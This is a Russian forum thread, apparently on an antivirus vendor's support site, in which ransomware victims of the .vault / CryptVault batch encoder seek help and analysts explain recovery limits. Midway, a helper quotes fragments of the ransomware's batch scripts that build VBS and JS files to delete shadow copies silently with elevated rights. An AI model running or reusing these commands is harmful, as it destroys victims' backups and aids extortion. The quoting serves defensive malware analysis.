Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS
Зашифровались файлы с расшрирением  doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Ответы

Пред. 1 ... 41 42 43 44 45 ... 49 След.
santy,
еще вопрос. Давно ли .VAULT зачищает теневые копии?
+
еще один командный сценарий на руках имеется - не сможете Его прокомментировать? На всяк случай запоролил, хотя это было излишним: infected
достаточно давно (месяца два не меньше, если не больше). файл сейчас гляну
а что именно по этому файлу прокомментировать? отключение теневых копий? надо сравнить со старыми вариантами бат-энкодера.
немного позже.
Изменено: santy - 04.06.2016 18:04:48
santy,
ну не знаю. может, какой "новый"/другой подход, хотя... фиг с Ним
вот скажем в начале апреля был вариант.

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"

а это на конец марта

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%TEMP%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%TEMP%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%TEMP%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%TEMP%\win.vbs"
Цитата
NickM написал:
Давно ли .VAULT зачищает теневые копии?

Цитата
santy написал:
достаточно давно (месяца два не меньше, если не больше).

Комп сейчас не под рукой чтобы наверняка проверить, а сам еще этим вопросом не задавался... а что, для выполнения <"objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0"> не требуется прав администратора и/или повышение привелегий от UAC?
Изменено: NickM - 04.06.2016 18:04:48
NickM, тестирую в основном на XP, не наблюдал как этот фрагмент отрабатывает на Win7,8
Доброго времени суток.
Тоже прошелся vault по машине - зашифровал данные...
Остались следующие файлы
vault.txt
vault.key
confirmation.key
в папке gnupg\
pubring.gpg
random_seed.
trustdb.gpg
еще остался батник который все это натворил Se5e.bat (в нем присутствует строка на на создание SECRING.QPQ с последующим переименованием в secring.gpg - самого файла нет).
Есть ли надежда на дешифровку?  
Отправляю архив (пароль - infected )
МАксим,
без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии
Изменено: santy - 04.06.2016 18:05:31
Здравствуйте. Позвольте присоединиться к пострадавшим от шифровальщика.
secring.gpg нулевого размера.
Есть pubring.gpg и trustdb.gpg ненулевого размера.
В %temp% лежат файлы 7fbf4b71_VAULT.KEY, CONFIRMATION.KEY, VAULT.KEY
Образ автозапуска тут
Денис,

Цитата
без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии

+
проверьте, чтобы в автозапуске системы не было запчастей от ВАУЛТ, в частности js
который может запустить повторное шифрование.
Пред. 1 ... 41 42 43 44 45 ... 49 След.
Читают тему